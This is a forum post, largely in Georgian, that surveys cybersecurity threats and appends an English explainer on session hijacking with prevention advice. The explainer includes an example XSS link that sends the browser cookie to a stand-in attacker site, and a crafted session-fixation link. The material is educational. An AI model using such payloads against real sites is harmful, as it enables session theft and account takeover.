ღრუბლოვანი სერვისების ზრდა ასევე გაზრდის მუშაობის საჭიროებას მესამე მხარის ვენდორებთან პროგრამული უზრუნველყოფისა და სერვისებისთვის. ამას მივყავართ მიმწოდებელი ჯაჭვის თავდასხმების ზრდასთან, რომელსაც შეუძლია გადაკვეთოს საერთაშორისო საზღვრები. მას შემდეგ, რაც გლობალური კომერცია გაიზრდება, გადაწყვეტილებები მოიცავს პროგრამულ უზრუნველყოფასა და უსაფრთხოების ზომების განახლებას, VPN სერვისის გამოყენებას და გარე ბიბლიოთეკებიდან ძირითადი პროგრამების თავის არიდებას.

მიუხედავად იმისა, რომ VPN ზოგჯერ ნეგატიურად არის აღქმული, ის უნდა წარმოადგენდეს უსაფრთხოების საწყის სტრატეგიას, როგორც ინდივიდებისთვის, ასევე ბიზნესისთვის. ბაზარზე ერთ-ერთ ყველაზე პოპულარულ სერვისს, NordVPN–ს ხუთი ათასზე მეტი სერვერი აქვს. სხვებს შესაძლოა მეტი შეთავაზებები ჰქონდეთ, სასურველი VPN-ის შერჩევამდე, თქვენ უბრალოდ უნდა ჩაატაროთ საკუთარი კვლევა და შეადაროთ, რომელი კომპანია რა პროდუქტს გთავაზობთ, რათა აარჩიოთ საჭირო მახასიათებლების მიხედვით.

  1. პროფესიონალი კადრების დეფიციტი

კიბერუსაფრთხოების ხარჯები, სავარაუდოდ, მომდევნო ორი წლის განმავლობაში მიაღწევს 133.8 მილიარდ აშშ დოლარს. ამასთან, არსებობს  გლობალური დეფიციტი 2,930,000 კიბერ-უსაფრთხოებასთან დაკავშირებული პოზიციებისა, რომლებიც არ არის შევსებული. კიბერდანაშაულის წინააღმდეგ ბრძოლისას პერსონალის ნაკლებობა გამოიწვევს ფულის, რეპუტაციის და ნდობის უფრო მეტ დანაკარგს.

  1. დახვეწილი ფიშერული შეტევები

ფიშინგი და სოციალური ინჟინერიის სხვა ექსპლუატაციები ახალი არ არის. ისინი გააგრძელებენ ჩვენთან ყოფნას, სანამ ელ-ფოსტა და პირადი შეტყობინების პლატფორმები იარსებებს, რათა წვდომა ჰქონდეთ ჩვენს პირად და ბიზნეს კორესპონდენციებზე.

5.jpg

ამასთან, ეს დანაშაულები ბევრად უფრო დახვეწილია. ადამიანების უმეტესობამ იცის საეჭვო შეტყობინებებისა და ბმულების საფრთხეები. შესაბამისად, ჰაკერები მიმართავენ ხელოვნურ ინტელექტსა და მანქანურ სწავლებას, რათა მათი შეტევები იყოს განხორციელებული უაღრესად მიზნობრივი, უფრო პერსონალიზირებული ელექტრონული შეტყობინებებით, რომლებიც თავდასხმას ძნელად ამოსაცნობს ხდის.

ვინაიდან მონაცემთა გაჟონვის ერთი მესამედი განპირობებულია უყურადღებობით, იმედი გვაქვს, რომ თანამშრომელთა ტრენინგები შეამსუბუქებს უსაფრთხოების ზოგიერთ პრევენციულ საკითხს, რომლებიც ძალზე გავრცელებულია მთელი მსოფლიოს მასშტაბით.

  1. კიბერ შეტევები ქსელებზე

ძალიან ბევრი ერთმანეთთან დაკავშირებული სისტემა წარმართავს ჩვენს ცხოვრებას, აქედან გამომდინარე, ჩვენ ვდგავართ სისტემური შეტევების სერიოზული საფრთხის წინაშე ელექტროქსელებზე, სატრანსპორტო სისტემებზე და სამხედრო ობიექტებზე. ერთი ელექტრომაგნიტური პულსის (EMP) შეტევამ შეიძლება დაარტყას მთელი ქვეყნის ელექტრულ პოტენციალს და ყველაფერს, რაც მასზეა დამოკიდებული.

ეს არის პრობლემა, რომელიც უნდა გამოსწორდეს სამთავრობო დონეზე, რადგან საკითხი საკმაოდ სერიოზულია, თუნდაც იმის გათვალისწინებით, რომ გლობალური ზესახელმწიფოებიც კი არ დგანან საკმარისად მტკიცედ ამ ტიპის ვრცელი თავდასხმების წინააღმდეგ.

  1. პირადი თავდასხმები

კიბერ შევიწროვება და თვალთვალი მატულობს, რასაც ხშირად ლეტალური შედეგები მოყვება ხოლმე. ამ დანაშაულების უმეტესობა ინტერნეტში იწყება  და სრულდება სავალალო შედეგებით რეალურ სამყაროში. კიბერდანაშაულის რისკების დასაბალანსებლად საჭიროა მომხმარებელთა განათლება უნივერსიტეტებში ან სამსახურებში.

  1. სახელმწიფოს მიერ დაფინანსებული შეტევები

ჰაკინგი აღარ არის მხოლოდ ჩრდილში მდგომი პირების ან კოლექტივების სფერო. ახალი კრიმინალური საწარმოები არიან სახელმწიფოს მიერ დაფინანსებული აგენტები, რომლებიც იყენებენ ტექნოლოგიას მოწინააღმდეგეების დასაძლევად კრიტიკულ სისტემებზე გავრცელებული შეტევების გზით. 

  1. IoT და ავტომატიზირებული სისტემები

9-1024x683.jpg

ურთიერთკავშირი ერთ–ერთი უდიდესი ტექნოლოგიური მიღწევაა, როდესაც საქმე ეხება კომფორტული გარემოს შექმნას, ცხოვრებისა და მუშაობის პროცესის გაუმჯობესებას. ამასთან, ქსელური მოწყობილობები, რომლებიც აკავშირებენ ჩვენს ტელეფონებს, უსაფრთხოების სისტემებს, მოწყობილობებს და მანქანებს ერთმანეთთან, ასევე ზრდის საფრთხეს ჩვენი უსაფრთხოებისა და მონაცემთა მთლიანობისთვის.

მიუხედავად იმისა, რომ ადამიანების უმეტესობამ იცის უსაფრთხო ინტერნეტ კავშირების გამოყენება ტელეფონებსა და პირად მოწყობილობებში, რამდენს მიაჩნია, რომ საჭიროა სარეცხი მანქანების, მაცივრების, სახლის კინოთეატრების ან მანქანების უსაფრთხოება? მიუხედავად იმისა, რომ ამ ტექნიკაზე წვდომას არ მოყვება პირადობის ქურდობა ან ცარიელი საბანკო ანგარიში, ისინი ხშირად დაკავშირებულია ქსელებთან, სადაც უფრო მგრძნობიარე ინფორმაციაა განთავსებული.

ბიზნესმა, სამთავრობო სააგენტოებმა და ინდივიდუალურმა პირებმა უნდა მოახდინონ ქსელის სეგმენტიზაცია, ნაკლები და მაღალი რისკის მქონე მოწყობილობების განცალკევება, გამოიყენონ რთული და შეცვლილი პაროლები ვიდრე, default პაროლებია (მაგ. admin), და დაიცვან end-point მოწყობილობები ყველანაირი კავშირისას.

  1. ჯანმრთელობაზე ზრუნვის ჭკვიანი მოწყობილობები და EMR

როგორც უკვე აღვნიშნეთ, ჯანდაცვის ინდუსტრია ერთ-ერთი ყველაზე დიდი სამიზნეა მონაცემთა ქურდებისა და სხვა კიბერ დანაშაულებისთვის. ჭკვიანი ტექნოლოგიის განვითარებამ სასიცოცხლო ნიშნებისა და სამედიცინო მდგომარეობების მონიტორინგამდე და უფრო სრულყოფილად მკურნალობამდე მიგვიყვანა, მაგრამ მან ასევე წარმოშვა უფრო დიდი რისკები ჰაკინგის თვალსაზრისით. წარმოიდგინეთ, არაკეთილსინდისიერი ადამიანი, რომელიც მონაცემთა ბაზებში ან სამედიცინო ქსელში შეიჭრება და მოიპარავს სადაზღვევო ინფორმაციას, აღმოაჩენს მისთვის საინტერესო მგრძნობიარე სამედიცინო ინფორმაციას, ან თუნდაც საშუალება ექნება ზემოქმედება მოახდინოს ან გააჩეროს გულის რიტმის წამმართველი მოწყობილობა, ე.წ. pacemaker-ი.

ბოლოთქმა

კიბერ დანაშაული დიდი ბიზნესია, ყველაზე ელიტარული ჰაკერები წელიწადში ნახევარ მილიონ დოლარს შოულობენ სისტემის უსაფრთხოების ტესტირებისას; ‘ცუდი ბიჭები’ კიდევ უფრო მეტს.

კიბერ უსაფრთხოება მხოლოდ IT სფეროს ინტერესის საგანი არ არის. რაც უფრო მეტი ბიზნესი და სერვისებია ვირტუალურ გარემოში, მით უფრო მეტი პოტენციალი აქვთ თავდამსხმელებს, შექმნან ექსპლოიტები და გავლენა იქონიონ  მთელი მსოფლიოს რეგიონებზე. პრობლემის აქტუალობიდან გამომდინარე, ბიზნესისა და მთავრობის ლიდერებმა უნდა გაითვალისწინონ უსაფრთხოება მათი ორგანიზაციული დაგეგმვის, ქსელის შექმნისა და პროგრამულ უზრუნველყოფასთან მუშაობის პროცესში.

 

 

პს. https://www.netsparker.com/blog/web-security/session-hijacking/  Session Hijacking :giveup:

Spoiler

What Is Session Hijacking: Your Quick Guide to Session Hijacking Attacks

Category: Web Security Readings - Last Updated: Thu, 22 Aug 2019 - by Zbigniew Banach

Session hijacking is an attack where a user session is taken over by an attacker. A session starts when you log into a service, for example your banking application, and ends when you log out. The attack relies on the attacker’s knowledge of your session cookie, so it is also called cookie hijacking or cookie side-jacking. Although any computer session could be hijacked, session hijacking most commonly applies to browser sessions and web applications.

What Is Session Hijacking: Your Quick Guide to Session Hijacking Attacks

In most cases when you log into a web application, the server sets a temporary session cookie in your browser to remember that you are currently logged in and authenticated. HTTP is a stateless protocol and session cookies attached to every HTTP header are the most popular way for the server to identify your browser or your current session.

To perform session hijacking, an attacker needs to know the victim’s session ID (session key). This can be obtained by stealing the session cookie or persuading the user to click a malicious link containing a prepared session ID. In both cases, after the user is authenticated on the server, the attacker can take over (hijack) the session by using the same session ID for their own browser session. The server is then fooled into treating the attacker’s connection as the original user’s valid session.

Note: The related concept of TCP session hijacking is not relevant when talking about attacks that target session cookies. This is because cookies are a feature of HTTP, which is an application-level protocol, while TCP operates on the network level. The session cookie is an identifier returned by the web application after successful authentication, and the session initiated by the application user has nothing to do with the TCP connection between the server and the user’s device.

What Can Attackers Do After Successful Session Hijacking?

If successful, the attacker can then perform any actions that the original user is authorized to do during the active session. Depending on the targeted application, this may mean transferring money from the user’s bank account, posing as the user to buy items in web stores, accessing detailed personal information for identity theft, stealing clients’ personal data from company systems, encrypting valuable data and demanding ransom to decrypt them – and all sorts of other unpleasant consequences.

One particular danger for larger organizations is that cookies can also be used to identify authenticated users in single sign-on systems (SSO). This means that a successful session hijack can give the attacker SSO access to multiple web applications, from financial systems and customer records to line-of-business systems potentially containing valuable intellectual property. For individual users, similar risks also exist when using external services to log into applications, but due to additional safeguards when you log in using your Facebook or Google account, hijacking the session cookie generally won’t be enough to hijack the session.

What Is the Difference Between Session Hijacking and Session Spoofing?

While closely related, hijacking and spoofing differ in the timing of the attack. As the name implies, session hijacking is performed against a user who is currently logged in and authenticated, so from the victim’s point of view the attack will often cause the targeted application to behave unpredictably or crash. With session spoofing, attackers use stolen or counterfeit session tokens to initiate a new session and impersonate the original user, who might not be aware of the attack.

What Are the Main Methods of Session Hijacking and How Do They Work?

Attackers have many options for session hijacking, depending on the attack vector and the attacker’s position. The first broad category are attacks focused on intercepting cookies:

  • Cross-site scripting (XSS): This is probably the most dangerous and widespread method of web session hijacking. By exploiting server or application vulnerabilities, attackers can inject client-side scripts (typically JavaScript) into web pages, causing your browser to execute arbitrary code when it loads a compromised page. If the server doesn’t set the HttpOnly attribute in session cookies, injected scripts can gain access to your session key, providing attackers with the necessary information for session hijacking.

For example, attackers may distribute emails or IM messages with a specially crafted link pointing to a known and trusted website but containing HTTP query parameters that exploit a known vulnerability to inject script code. For an XSS attack used for session hijacking, the code might send the session key to the attacker’s own website, for instance: 


http://www.TrustedSearchEngine.com/search?<script>location.href='http://www.SecretVillainSite.com/hijacker.php?cookie='+document.cookie;</script>

This would read the current session cookie using document.cookie and send it to the attacker’s website by setting the location URL in the browser using location.href. In real life, such links may use character encoding to obfuscate the code and URL shortening services to avoid suspiciously long links. In this case, a successful attack relies on the application and web server accepting and executing unsanitized input from the HTTP request.

Illustration of session hijacking using XSS

Figure 1. Illustration of session hijacking using XSS

  • Session side jacking: This type of attack requires the attacker’s active participation, and is the first thing that comes to mind when people think of “being hacked”. Using packet sniffing, attackers can monitor the user’s network traffic and intercept session cookies after the user has authenticated on the server. If the website only uses SSL/TLS encryption for the login pages and not for the entire session, the attacker can use the sniffed session key to hijack the session and impersonate the user to perform actions in the targeted web application. Because the attacker needs access to the victim’s network, typical attack scenarios involve unsecured Wi-Fi hotspots, where the attacker can either monitor traffic in a public network or set up their own access point and perform man-in-the-middle attacks.

Illustration of session hijacking using packet sniffing

Figure 2. Illustration of session hijacking using packet sniffing

Other methods of determining or stealing the session cookie also exist:

  • Session fixation: To discover the victim’s cookie, the attacker may simply supply a known session key and trick the user into accessing a vulnerable server. There are many ways to do this, for example by using HTTP query parameters in a crafted link sent by e-mail or provided on a malicious website, for example: 

<a href="http://www.TrustedSite.com/login.php?sessionid=iknowyourkey">Click here to log in now</a>

When the victim clicks the link, they are taken to a valid login form, but the session key that will be used is supplied by the attacker. After authentication, the attacker can use the known session key to hijack the session.

Another method of session fixation is to trick the user into completing a specially crafted login form that contains a hidden field with the fixed session ID. More advanced techniques include changing or inserting the session cookie value using a cross-site scripting attack or directly manipulating HTTP header values (which requires access to the user’s network traffic) to insert a known session key using the Set-Cookie parameter. 

One legacy trick that will no longer work in modern browsers (since Chrome 65 and Firefox 68) was to inject the <meta http-equiv="Set-Cookie"> HTML tag to set the cookie value via the metadata tag. This functionality has also been removed from the official HTML spec.

  • Cookie theft by malware or direct access: A very common way of obtaining session cookies is to install malware on the user’s machine to perform automated session sniffing. Once installed, for example after the user has visited a malicious website or clicked a link in a spam email, the malware scans the user’s network traffic for session cookies and sends them to the attacker. Another way of obtaining the session key is to directly access the cookie file in the client browser’s temporary local storage (often called the cookie jar). Again, this task can be performed by malware, but also by an attacker with local or remote access to the system.
  • Brute force: Finally, the attacker can simply try to guess the session key of a user’s active session, which is feasible only if the application uses short or predictable session identifiers. In the distant past, sequential keys were a typical weak point, but with modern applications and protocol versions session IDs are long and generated randomly. To ensure resistance to brute force attacks, the key generation algorithm must give truly unpredictable values with enough entropy to make guessing attacks impractical.

How Can You Prevent Session Hijacking?

The session hijacking threat exists due to limitations of the stateless HTTP protocol. Session cookies are a way of overcoming these constraints and allowing web applications to identify individual computer systems and store the current session state, such as your shopping in an online store.

For regular browser users, following some basic online safety rules can help reduce risk, but because session hijacking works by exploiting fundamental mechanisms used by the vast majority of web applications, there is no single guaranteed protection method. However, by hardening multiple aspects of communication and session management, developers and administrators can minimize the risk of attackers obtaining a valid session token:

  • Use HTTPS to ensure SSL/TLS encryption of all session traffic. This will prevent the attacker from intercepting the plaintext session ID, even if they are monitoring the victim’s traffic. Preferably, use HSTS (HTTP Strict Transport Security) to guarantee that all connections are encrypted.
  • Set the HttpOnly attribute using the Set-Cookie HTTP header to prevent access to cookies from client-side scripts. This prevents XSS and other attacks that rely on injecting JavaScript in the browser. Specifying the Secure and SameSite directives is also recommended for additional security.
  • Web frameworks offer highly secure and well-tested session ID generation and management mechanisms. Use them instead of inventing your own session management.
  • Regenerate the session key after initial authentication. This causes the session key to change immediately after authentication, which nullifies session fixation attacks – even if the attacker knows the initial session ID, it becomes useless before it can be used.
  • Perform additional user identity verification beyond the session key. This means using not just cookies, but also other checks, such as the user’s usual IP address or application usage patterns. The downside of this approach is that any false alarms can be inconvenient or annoying to legitimate users. A common additional safeguard is a user inactivity timeout to close the user session after a set idle time.
 

 

1

 

 
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



შესვლა
 Share
უკან